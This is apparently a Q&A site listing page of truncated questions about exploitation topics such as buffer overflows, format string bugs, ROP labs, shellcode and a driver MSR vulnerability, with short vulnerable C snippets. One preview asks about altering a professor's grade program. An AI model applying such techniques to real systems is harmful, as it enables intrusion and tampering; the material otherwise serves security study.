Skip to main content
801 questions
Newest Active Bountied Unanswered
-3 votes
0 answers
118 views

I'm working on an assignment where I need to overwrite the GOT table with the system call in order to execute a payload. The initial access is done via a stack buffer overflow. Here is the code of the ...
user29622040's user avatar
  • 11
4 votes
2 answers
211 views

I am studying for my Computer Security exam and I am on the Format String Bugs section. In the notes there is this code, and I was testing it on my VM: #include <stdio.h> void test(char *arg) { ...
teozzo's user avatar
  • 51
4 votes
1 answer
202 views

I made a simple vulnerable program greet.c: #include <stdio.h> #include <string.h> int main (int argc, char **argv) { char buf[32]; strcpy(buf, argv[1]); printf("%s\n"...
AISK's user avatar
  • 65
1 vote
1 answer
214 views

I am working on phase 4 of the buffer overflow attack lab, where the solution is is to use ROP (Return Oriented Programming). The idea is that you are given a "farm" where you will look for ...
Ian Burns's user avatar
  • 43
2 votes
0 answers
110 views

I am following a walkthrough of a box on VulnHub, The Planets: Venus. I got the shell to run through a buffer overflow, by putting an 8 byte padding, a gadget(pop rdi; ret), an address pointing to &...
DeceptiveRat's user avatar
  • 31
0 votes
1 answer
44 views

I have the disassamble bytes of a simple function 89 4C 24 08 mov dword ptr [sum],ecx while (sum>=1) { 83 7C 24 08 01 cmp dword ptr [sum],1 7C 0C ...
wanyancan's user avatar
  • 392
2 votes
2 answers
889 views

I am trying to test this example from StackOverflow (how-can-i-invoke-buffer-overflow), but I am not having success. I also asked for clarification two weeks ago, directly on the post (through a ...
nostromo's user avatar
  • 423
5 votes
2 answers
131 views

I am learning about shellcode development in C with an example from here. I can compile the assembly code and get de opcodes, also I can run successfully the ELF compiled with NASM, but I get a ...
RobertGG's user avatar
  • 135
2 votes
0 answers
127 views

There is a vulnerability in Tomcat 10.1.28 where inserting a semicolon in the url path will allow seeing the contents of a file. For example, the URL: mysite.com/myapp;/thisfile.config will display ...
JPCharlie's user avatar
  • 21
0 votes
0 answers
44 views

I'm working with CVE-2019-0704 (BlueKeep) and have found myself working with PDU protocols. I understand the surface-level, but I need a deeper understanding of the ways that it interacts with the RDP ...
X the Mystic's user avatar
  • 1
1 vote
0 answers
107 views

PROBLEM I am trying to put together a short demonstration of a simple hack for a presentation about cyber-security. I thought about using a format string vulnerability, and heavily inspired by this ...
arg_arthur's user avatar
  • 108
0 votes
1 answer
99 views

I am currently playing around with some exploitation techniques in 64-bit Intel executable. My program was compiled with canary protection disabled (-fno-stack-protector), buffer overflow error ...
Anh Phan's user avatar
  • 13
2 votes
1 answer
329 views

I discovered a driver vulnerability that allows arbitrary modification of the msr register. A common attack scenario is to modify msr[lstar] to point it to the attacker's malicious code. Then, when ...
007 996's user avatar
  • 33
-1 votes
2 answers
97 views

I define object a with an empty method b(). The method has no parameter and does nothing! Please someone tell me, why when I call a.b() and pass JS code as a parameter, does it execute the code? ...
KeepCalmBaby's user avatar
  • 24
1 vote
1 answer
135 views

#include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> /* I obtained access to the professor's grade management program. Can I change my grade to an '...
vivian phung's user avatar
  • 39

15 30 50 per page
1
2 3 4 5
54